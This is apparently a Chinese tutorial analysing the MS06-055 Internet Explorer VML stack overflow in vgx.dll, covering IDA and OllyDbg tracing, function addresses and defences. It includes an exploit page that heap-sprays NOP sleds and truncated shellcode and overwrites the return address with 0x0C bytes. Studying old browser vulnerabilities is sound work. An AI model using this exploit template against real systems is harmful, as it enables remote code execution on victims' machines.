MS06-055 IE 栈溢出漏洞分析与利用<\/h1>

漏洞概述<\/h2>
MS06-055是Internet Explorer在解析VML（Vector Markup Language）标记语言时存在的一个基于栈的缓冲区溢出漏洞。该漏洞存在于IE的核心组件vgx.dll中，具体漏洞函数为`SHADETYPE_TEXT::TEXT(ushort const *, int)<\/code>，该函数在处理VML标记时未对字符串长度进行限制，导致栈溢出。<\/p>`

漏洞触发原理<\/h2>
漏洞触发流程：<\/p>

IE解析包含VML标记的HTML文档<\/li>
处理<v:fill method="..."\/><\/code>标签时调用vgx.dll中的漏洞函数<\/li>
SHADETYPE_TEXT::TEXT<\/code>函数将method属性值复制到栈缓冲区时未检查长度<\/li>
超长字符串覆盖栈上的关键数据，包括返回地址<\/li>
<\/ol>
分析环境准备<\/h2>

操作系统：Windows 2000 SP4<\/li>
IE版本：5.00.3700.1000<\/li>
Vgx.dll版本：5.0.3014.1003<\/li>
分析工具：

OllyDbg (OD) - 动态调试<\/li>
IDA Pro - 静态分析<\/li>
<\/ul>
<\/li>
<\/ul>
VML标记语言简介<\/h2>
VML（矢量标记语言）是IE 5.0+支持的HTML扩展，用于在网页中绘制矢量图形。基本语法：<\/p>
<html<\/span> xmlns:v<\/span>=<\/span>"urn:schemas-microsoft-com:vml"<\/span>>
<\/span><\/span><head<\/span>>
<\/span><\/span><style<\/span>>
<\/span><\/span><!<\/span>--v<\/span>\<\/span>:*<\/span> { behavior: url(#default#VML<\/span>); }--<\/span>><\/span>
<\/span><\/span><\/style<\/span>>
<\/span><\/span><\/head<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span><v:rect<\/span> style<\/span>=<\/span>"width:44pt;height:44pt"<\/span> fillcolor<\/span>=<\/span>"black"<\/span>>
<\/span><\/span><v:fill<\/span> method<\/span>=<\/span>"QQQQ"<\/span>\/>
<\/span><\/span><\/v:rect<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>关键元素：<\/p>

v:rect<\/code> - 绘制矩形<\/li>
style<\/code> - 定义尺寸等属性<\/li>
v:fill<\/code> - 定义填充方式，其中method<\/code>属性是漏洞触发点<\/li>
<\/ul>
漏洞分析过程<\/h2>
静态分析<\/h3>

使用IDA加载vgx.dll，定位漏洞函数SHADETYPE_TEXT::TEXT<\/code>（地址：0x659D7B46）<\/li>
分析发现函数内部调用0x659D7AEA<\/code>进行字符串复制操作<\/li>
复制操作前未对源字符串长度进行检查<\/li>
<\/ol>
动态调试<\/h3>

使用OD附加IE进程<\/li>
在0x659D7B46处设置断点<\/li>
加载包含VML的HTML文档触发断点<\/li>
单步执行观察：

执行到0x659D7B86处的Call 659D7AEA<\/code>时，method属性值被复制到栈中<\/li>
使用超长字符串（如200个"Q"）可覆盖栈上数据<\/li>
函数返回地址被覆盖导致控制流劫持<\/li>
<\/ul>
<\/li>
<\/ol>
关键代码片段<\/h3>
659D7B46  push ebp
659D7B47  mov ebp, esp
...
659D7B86  call 659D7AEA    ; 漏洞点 - 未检查长度的字符串复制
<\/code><\/pre>
漏洞利用技术<\/h2>
Heap Spray技术<\/h3>
利用步骤：<\/p>

使用JavaScript申请200块1MB大小的内存<\/li>
每块内存填充大量NOP指令(0x90)和shellcode<\/li>
覆盖内存地址0x0C0C0C0C<\/li>
用大量0x0C字节覆盖返回地址为0x0C0C0C0C<\/li>
EIP滑过NOP后执行shellcode<\/li>
<\/ol>
Exploit代码结构<\/h3>
<html<\/span> xmlns:v<\/span>=<\/span>"urn:schemas-microsoft-com:vml"<\/span>>
<\/span><\/span><head<\/span>>
<\/span><\/span><title<\/span>>failwest<\/title<\/span>>
<\/span><\/span><style<\/span>>
<\/span><\/span><!<\/span>--v<\/span>\<\/span>:*<\/span> { behavior: url(#default#VML<\/span>); }--<\/span>><\/span>
<\/span><\/span><\/style<\/span>>
<\/span><\/span><script<\/span> language<\/span>=<\/span>"javascript"<\/span>>
<\/span><\/span>var<\/span> shellcode<\/span>=<\/span>"\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91..."<\/span>;
<\/span><\/span>var<\/span> nop<\/span>=<\/span>"\u9090\u9090"<\/span>;
<\/span><\/span>while<\/span> (nop<\/span>.length<\/span><=<\/span> 0x100000<\/span>\/<\/span>2<\/span>) { nop<\/span>+=<\/span>nop<\/span>; }
<\/span><\/span>var<\/span> slide<\/span> =<\/span> new<\/span> Array();
<\/span><\/span>for<\/span> (var<\/span> i<\/span>=<\/span>0<\/span>; i<\/span><<\/span>200<\/span>; i<\/span>++<\/span>) { slide<\/span>[i<\/span>] =<\/span> nop<\/span> +<\/span> shellcode<\/span>; }
<\/span><\/span><\/script<\/span>>
<\/span><\/span><body<\/span>>
<\/span><\/span><v:rect<\/span> style<\/span>=<\/span>"width:444pt;height:444pt"<\/span> fillcolor<\/span>=<\/span>"black"<\/span>>
<\/span><\/span><v:fill<\/span> method<\/span>=<\/span>"ఌఌఌఌ...ఌఌఌఌ"<\/span>\/> <!-- 大量0x0C字符 --><\/span>
<\/span><\/span><\/v:rect<\/span>>
<\/span><\/span><\/body<\/span>>
<\/span><\/span><\/html<\/span>>
<\/span><\/span><\/code><\/pre>Shellcode执行流程<\/h3>

返回地址被覆盖为0x0C0C0C0C<\/li>
EIP跳转到堆内存<\/li>
执行NOP滑板指令<\/li>
最终执行shellcode弹出对话框<\/li>
<\/ol>
防御措施<\/h2>

及时安装微软安全补丁MS06-055<\/li>
禁用VML支持（设置IE安全级别）<\/li>
使用DEP等内存保护技术<\/li>
启用ASLR随机化内存布局<\/li>
<\/ol>
总结<\/h2>
MS06-055漏洞展示了经典栈溢出漏洞的完整生命周期：<\/p>

漏洞成因：未检查长度的字符串复制<\/li>
利用方法：Heap Spray技术绕过ASLR<\/li>
攻击效果：任意代码执行<\/li>
防御思路：输入验证+内存保护<\/li>
<\/ol>
该漏洞分析过程涵盖了静态分析、动态调试、漏洞利用和防御等多个方面，是学习浏览器漏洞分析的典型案例。<\/p>